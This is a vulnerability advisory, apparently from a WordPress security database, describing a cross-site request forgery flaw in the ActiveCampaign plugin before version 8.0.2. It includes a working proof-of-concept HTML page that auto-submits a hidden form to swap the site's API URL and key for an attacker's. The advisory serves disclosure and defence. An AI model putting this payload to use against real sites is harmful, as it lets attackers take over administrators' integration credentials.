ActiveCampaign < 8.0.2 - Cross-Site Request Forgery in Settings

2020-09-0600:00:00

Nguyen Anh Tien

348

0.001 Low

EPSS

Percentile

27.5%

JSON

The ActiveCampaign 8.0.1 plugin is lacking CSRF check on its Settings form, which could allow attacker to make a logged-in administrator change API Credentials to attacker’s account.

When a logged-in administrator accesses an HTML page embedded below content, the plugin's setting will be changed.

<html>
  <body>
    <form action="http://example.com/wp-admin/options-general.php?page=activecampaign" method="POST">
      <input type="hidden" name="api&#95;url" value="https&#58;&#47;&#47;yopmail59247&#46;api&#45;us1&#46;com" />
      <input type="hidden" name="api&#95;key" value="1eddfe8b3ac848b2154b0f6a1a345730ecef457745c2b70463e0a4838fd30d681ec20369" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

References

plugins.trac.wordpress.org/changeset/2375366

0.001 Low

EPSS

Percentile

27.5%

JSON

Related for WPEX-ID:A72A5BE4-654B-496F-94CD-3814C0E40120